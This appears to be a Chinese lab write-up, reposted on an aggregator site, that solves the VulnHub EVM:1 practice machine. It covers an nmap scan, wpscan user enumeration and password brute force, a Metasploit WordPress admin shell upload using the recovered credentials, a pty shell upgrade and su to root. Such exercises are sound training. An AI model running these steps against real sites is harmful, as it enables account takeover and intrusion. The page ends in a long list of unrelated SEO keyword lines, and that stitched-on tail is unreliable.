Vulhub-EVM1靶机的使用方法
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,一.环境搭建Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。地址h
千家信息网最后更新 2025年12月01日Vulhub-EVM1靶机的使用方法
一.环境搭建
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
地址
https://www.vulnhub.com/entry/evm-1,391/
下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)
ip为192.168.124.156
二.信息搜集:
(端口扫描)
nmap -A 192.168.124.56Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 ESTNmap scan report for localhost (192.168.124.56)Host is up (0.00035s latency).Not shown: 993 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)| dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works110/tcp open pop3?139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open imap Dovecot imapd|_imap-capabilities: CAPABILITY445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)MAC Address: 00:0C:29:C4:5F:AA (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: , NetBIOS MAC: (unknown)| smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)| Computer name: ubuntu-extermely-vulnerable-m4ch2ine| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00| Domain name: \x00| FQDN: ubuntu-extermely-vulnerable-m4ch2ine|_ System time: 2019-12-16T01:48:21-05:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 2.02: |_ Message signing enabled but not required| smb2-time: | date: 2019-12-16 01:48:21|_ start_date: N/A (目录扫描)
开始使用dirb进行目录扫描dirb http://192.168.124.56/
从目录扫描看出他有wordpress所以先试试之前使用过的工具wpscan
wpscan --url http://192.168.124.56/wordpress/ -e u

成功得到账号c0rrupt3d_brain,现在继续破解他的密码
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt
成功破解出密码24992499
现在开始使用msfconsole 使用模块
unix/webapp/wp_admin_shell_uploadset RhOSTS 192.168.124.56set USERNAME c0rrupt3d_brainset PassWORD 24992499set targeturi /wordpressrun直接进入他的家目录之后cd root3r 进来之后发现有一个文件似乎是root密码文件
现在进行查看发现似乎是密码,既然已经知道了密码所以接下来进入交互页面如下图:
shellpython -c "import pty;pty.spawn('/bin/bash')"su root密码输入为:willy26
成功拿到root
密码
漏洞
目录
成功
文件
模式
网卡
镜像
靶场
安全
接下来
主机
信息
原理
命令
地址
工具
模块
环境
知识
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
枣庄商城软件开发哪家便宜
杭州数据库培训学费
有哪些免费下载论文数据库
哈密新通网络技术有限公司
网络安全基本要素不包括
无线 安全连接到服务器
深圳睿算大数据库
网络安全问题的根本
泗阳多功能网络技术是什么
网络安全的学Python吗
阿里云磁盘数据库恢复
手机怎么实现远程服务器
敲代码和软件开发区别
河南数据库安全箱生产厂家
mysql数据库建立用户
oracle数据库算法题
Linux服务器书
国际版基岩生存服务器
数据库当前时间的修改
数据库技术主要有什么模型
就要分享网软件开发
为什么视频连接不上服务器
数据库的安装部署
搭建nds服务器和管理解析
汉中网络技术参考价格
华为服务器故障码b03
如何创建java数据库
农信社软件开发部如何
签名验签服务器管理端
灵信软件开发有限公司